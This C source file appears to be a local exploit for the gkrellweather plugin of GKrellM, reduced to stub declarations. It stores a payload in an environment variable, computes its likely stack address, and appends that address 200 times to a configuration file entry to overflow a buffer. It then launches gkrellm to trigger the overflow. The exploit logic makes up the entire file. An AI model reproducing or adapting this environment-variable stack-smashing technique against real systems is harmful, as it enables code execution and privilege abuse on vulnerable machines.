
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CONFIG_PATH ;
 int ENV_NAME ;
 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int O_APPEND ;
 int O_WRONLY ;
 int close (int) ;
 int open (int ,int) ;
 char* payload ;
 scalar_t__ setenv (int ,char*,int) ;
 int snprintf (char*,int,char*,long) ;
 int strlen (char*) ;
 int system (char*) ;
 int write (int,char*,int) ;

int main(void)
{
 char lend[9], inject[4], ascii;
 long ret = 0xbffffffa
    - strlen(payload)
    - strlen("./gkrellweather2sh");



 int i, j, ucd = open(CONFIG_PATH, O_WRONLY | O_APPEND);

 if (ucd == -1)
  return EXIT_FAILURE;

 if (setenv(ENV_NAME, payload, 1) != 0)
  return EXIT_FAILURE;

 snprintf(lend, 9, "%lx", ret);

 i = 7; j = 0;
 while (j < 4) {
  ascii = (lend[i-1] >= 'a'
   ? ((lend[i-1] & 0xdf) - 'A') + 10
   : (lend[i-1] - '0'));
  ascii <<= 4;
  ascii += (lend[i] >= 'a'
   ? ((lend[i] & 0xdf) - 'A') + 10
   : (lend[i] - '0'));
  inject[j++] = ascii;
  i -= 2;
 }

 write(ucd, "gkrellweather filename ", 23);
 for (i = 0; i < 200; ++i)
  write(ucd, inject, 4);
 close(ucd);

 system("gkrellm");

 return EXIT_SUCCESS;
}
